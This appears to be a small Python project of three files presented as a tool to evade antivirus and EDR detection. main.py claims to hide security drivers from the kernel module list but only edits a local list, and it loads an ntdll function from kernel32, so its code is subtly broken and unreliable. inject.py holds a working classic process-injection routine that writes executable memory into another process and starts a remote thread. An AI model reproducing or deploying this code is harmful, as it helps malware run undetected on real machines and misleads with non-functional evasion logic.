[
    {
        "file_name": "main.py",
        "file_content": "import ctypes\nimport os\nimport sys\nfrom ctypes import wintypes\nfrom kernel32 import NtQuerySystemInformation, SystemModuleInformation, SYSTEM_MODULE_INFORMATION\n\n# Function to get the list of loaded kernel modules\ndef get_loaded_modules():\n    \"\"\"Retrieve the list of loaded kernel modules.\"\"\"\n    module_list = []\n    size = 0\n    while True:\n        buffer = ctypes.create_string_buffer(size)\n        result = NtQuerySystemInformation(SystemModuleInformation, buffer, size, None)\n        if result == 0:\n            break\n        size += 0x1000\n    modules = ctypes.cast(buffer, ctypes.POINTER(SYSTEM_MODULE_INFORMATION)).contents\n    while modules:\n        module_list.append(modules.Base)\n        modules = modules.Next\n    return module_list\n\n# Function to hide a module from the list of loaded modules\ndef hide_module(module_base):\n    \"\"\"Hide a specific module from the list of loaded modules.\"\"\"\n    module_list = get_loaded_modules()\n    for i, base in enumerate(module_list):\n        if base == module_base:\n            del module_list[i]\n            break\n    return module_list\n\n# Function to restore the original list of loaded modules\ndef restore_modules(original_modules):\n    \"\"\"Restore the original list of loaded modules.\"\"\"\n    module_list = get_loaded_modules()\n    for module in original_modules:\n        if module not in module_list:\n            module_list.append(module)\n    return module_list\n\n# Main function to prevent automatic sample submission\ndef main():\n    \"\"\"Main function to prevent automatic sample submission by AV/EDR and signature scanning from kernel.\"\"\"\n    # Get the original list of loaded modules\n    original_modules = get_loaded_modules()\n\n    # Hide a specific module (example: hide a known AV/EDR driver)\n    hidden_module_base = 0xFFFFF80001000000  # Example base address of a module to hide\n    hidden_modules = hide_module(hidden_module_base)\n\n    # Perform actions that should not be detected by AV/EDR\n    # Example: Inject code into a process\n    # inject_code_into_process(target_process_id, code_to_inject)\n\n    # Restore the original list of loaded modules\n    restore_modules(original_modules)\n\nif __name__ == \"__main__\":\n    main()"
    },
    {
        "file_name": "kernel32.py",
        "file_content": "import ctypes\nfrom ctypes import wintypes\n\n# Define necessary constants and structures\nSYSTEM_MODULE_INFORMATION = 11\nNTSTATUS = wintypes.LONG\n\nclass SYSTEM_MODULE_INFORMATION(ctypes.Structure):\n    _fields_ = [\n        (\"Reserved1\", wintypes.PVOID),\n        (\"Reserved2\", wintypes.PVOID),\n        (\"ImageBase\", wintypes.PVOID),\n        (\"ImageSize\", wintypes.ULONG),\n        (\"Flags\", wintypes.ULONG),\n        (\"LoadOrderIndex\", wintypes.WORD),\n        (\"InitOrderIndex\", wintypes.WORD),\n        (\"LoadCount\", wintypes.WORD),\n        (\"ModuleNameOffset\", wintypes.WORD),\n        (\"ImageName\", wintypes.CHAR * 256),\n        (\"Next\", ctypes.POINTER(SYSTEM_MODULE_INFORMATION)),\n    ]\n\n# Load the kernel32.dll\nkernel32 = ctypes.WinDLL('kernel32', use_last_error=True)\n\n# Define the NtQuerySystemInformation function\nNtQuerySystemInformation = kernel32.NtQuerySystemInformation\nNtQuerySystemInformation.argtypes = [wintypes.ULONG, wintypes.PVOID, wintypes.ULONG, wintypes.PULONG]\nNtQuerySystemInformation.restype = NTSTATUS"
    },
    {
        "file_name": "inject.py",
        "file_content": "import ctypes\nfrom ctypes import wintypes\n\n# Define necessary constants and structures for process injection\nPROCESS_ALL_ACCESS = 0x1F0FFF\nTH32CS_SNAPPROCESS = 0x00000002\n\nclass PROCESSENTRY32(ctypes.Structure):\n    _fields_ = [\n        (\"dwSize\", wintypes.DWORD),\n        (\"cntUsage\", wintypes.DWORD),\n        (\"th32ProcessID\", wintypes.DWORD),\n        (\"th32DefaultHeapID\", wintypes.PVOID),\n        (\"th32ModuleID\", wintypes.DWORD),\n        (\"cntThreads\", wintypes.DWORD),\n        (\"th32ParentProcessID\", wintypes.DWORD),\n        (\"pcPriClassBase\", wintypes.LONG),\n        (\"dwFlags\", wintypes.DWORD),\n        (\"szExeFile\", wintypes.CHAR * 260),\n    ]\n\n# Function to inject code into a target process\ndef inject_code_into_process(target_process_id, code_to_inject):\n    \"\"\"Inject code into a target process.\"\"\"\n    hProcess = ctypes.windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, target_process_id)\n    if not hProcess:\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    # Allocate memory in the target process\n    alloc_mem_address = ctypes.windll.kernel32.VirtualAllocEx(hProcess, None, len(code_to_inject), 0x1000 | 0x2000, 0x40)\n    if not alloc_mem_address:\n        ctypes.windll.kernel32.CloseHandle(hProcess)\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    # Write the code to the allocated memory\n    if not ctypes.windll.kernel32.WriteProcessMemory(hProcess, alloc_mem_address, code_to_inject, len(code_to_inject), None):\n        ctypes.windll.kernel32.VirtualFreeEx(hProcess, alloc_mem_address, 0, 0x8000)\n        ctypes.windll.kernel32.CloseHandle(hProcess)\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    # Create a remote thread to execute the injected code\n    thread_id = ctypes.windll.kernel32.CreateRemoteThread(hProcess, None, 0, alloc_mem_address, None, 0, None)\n    if not thread_id:\n        ctypes.windll.kernel32.VirtualFreeEx(hProcess, alloc_mem_address, 0, 0x8000)\n        ctypes.windll.kernel32.CloseHandle(hProcess)\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    ctypes.windll.kernel32.CloseHandle(hProcess)"
    }
]